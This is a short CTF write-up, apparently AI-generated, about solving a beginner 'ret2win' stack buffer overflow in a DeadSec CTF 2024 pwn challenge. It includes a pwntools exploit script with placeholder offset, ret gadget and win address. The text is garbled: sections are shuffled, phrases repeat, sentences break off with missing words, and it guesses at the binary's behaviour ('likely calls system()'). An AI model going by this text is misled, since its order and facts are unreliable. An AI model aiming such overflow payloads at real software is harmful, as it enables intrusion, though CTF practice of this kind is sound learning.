In this specific challenge, many players ran into a common 64-bit exploitation issue: . The win() function likely calls system() , which requires the stack to be 16-byte aligned. If your exploit crashes at the movaps instruction inside system() , adding a dummy ret gadget (as shown in the script above) before the win_addr usually fixes the issue. Summary for a Blog Post Difficulty: Easy/Beginner. Key Concept: Stack Buffer Overflow & Stack Alignment. Tools Used: pwntools , gdb-pwndbg , checksec .
: The gets() function (or a similar unsafe read) is used to take the player's name, allowing you to overwrite the saved instruction pointer (RIP) on the stack.
The file is a challenge from the pwn category of the DeadSec CTF 2024 . To solve it, you need to exploit a buffer overflow vulnerability to execute a "ret2win" attack, redirected by a specific game mechanic within the binary. pwn_bloodh7nt.rar
To control the program's flow, you first need to find exactly how many bytes are required to reach the return address. You can use with the pwndbg or GEF extension.
Below is a breakdown of the exploitation process, which would make for an excellent technical blog post: In this specific challenge, many players ran into
from pwn import * # Setup target = process('./pwn_bloodh7nt') # target = remote('addr', port) # For the live challenge win_addr = 0x40123b # Replace with the actual address from your analysis offset = 40 # Replace with your discovered offset # The Payload # We add a 'ret' gadget if the binary is 64-bit to align the stack for system() calls ret_gadget = 0x40101a payload = b"A" * offset payload += p64(ret_gadget) payload += p64(win_addr) target.sendline(payload) target.interactive() Use code with caution. Copied to clipboard
Once you have the offset and the address of the win() function (found via info functions in GDB or nm binary ), you can write a simple Python exploit using the library: Summary for a Blog Post Difficulty: Easy/Beginner
Using a tool like checksec , you’ll notice that is enabled, but there is no Stack Canary . This suggests a classic stack-based buffer overflow.